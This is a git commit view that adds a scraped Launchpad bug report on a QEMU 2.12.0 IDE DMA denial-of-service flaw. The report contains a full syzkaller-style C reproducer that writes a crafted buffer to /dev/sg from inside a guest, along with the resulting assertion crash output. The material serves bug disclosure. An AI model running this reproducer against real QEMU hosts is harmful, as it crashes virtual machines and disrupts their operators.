summary refs log tree commit diff stats
path: root/results/scraper/launchpad-without-comments/1777315
diff options
context:
space:
mode:
Diffstat (limited to 'results/scraper/launchpad-without-comments/1777315')
-rw-r--r--results/scraper/launchpad-without-comments/177731572
1 files changed, 72 insertions, 0 deletions
diff --git a/results/scraper/launchpad-without-comments/1777315 b/results/scraper/launchpad-without-comments/1777315
new file mode 100644
index 00000000..4015f04c
--- /dev/null
+++ b/results/scraper/launchpad-without-comments/1777315
@@ -0,0 +1,72 @@
+IDE short PRDT abort
+
+Hi,
+QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
+
+run the program in qemu-2.12.0:
+#define _GNU_SOURCE 
+#include <endian.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <stdint.h>
+#include <string.h>
+
+static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
+{
+        if (a0 == 0xc || a0 == 0xb) {
+                char buf[128];
+                sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
+                return open(buf, O_RDWR, 0);
+        } else {
+                char buf[1024];
+                char* hash;
+strncpy(buf, (char*)a0, sizeof(buf) - 1);
+                buf[sizeof(buf) - 1] = 0;
+                while ((hash = strchr(buf, '#'))) {
+                        *hash = '0' + (char)(a1 % 10);
+                        a1 /= 10;
+                }
+                return open(buf, a2, 0);
+        }
+}
+
+uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
+void loop()
+{
+        long res = 0;
+memcpy((void*)0x20000000, "/dev/sg#", 9);
+        res = syz_open_dev(0x20000000, 0, 2);
+        if (res != -1)
+                r[0] = res;
+        res = syscall(__NR_dup2, r[0], r[0]);
+        if (res != -1)
+                r[1] = res;
+*(uint8_t*)0x20000ec0 = 0;
+*(uint8_t*)0x20000ec1 = 0;
+*(uint8_t*)0x20000ec2 = 0;
+*(uint8_t*)0x20000ec3 = 0;
+*(uint32_t*)0x20000ec8 = 0;
+*(uint8_t*)0x20000ed8 = 0;
+*(uint8_t*)0x20000ed9 = 0;
+*(uint8_t*)0x20000eda = 0;
+*(uint8_t*)0x20000edb = 0;
+memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
+        syscall(__NR_write, r[1], 0x20000ec0, 0x323);
+}
+
+int main()
+{
+        syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
+        loop();
+        return 0;
+}
+this will crash qemu, output information:
+ qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
+
+
+Thanks 
+owl337
\ No newline at end of file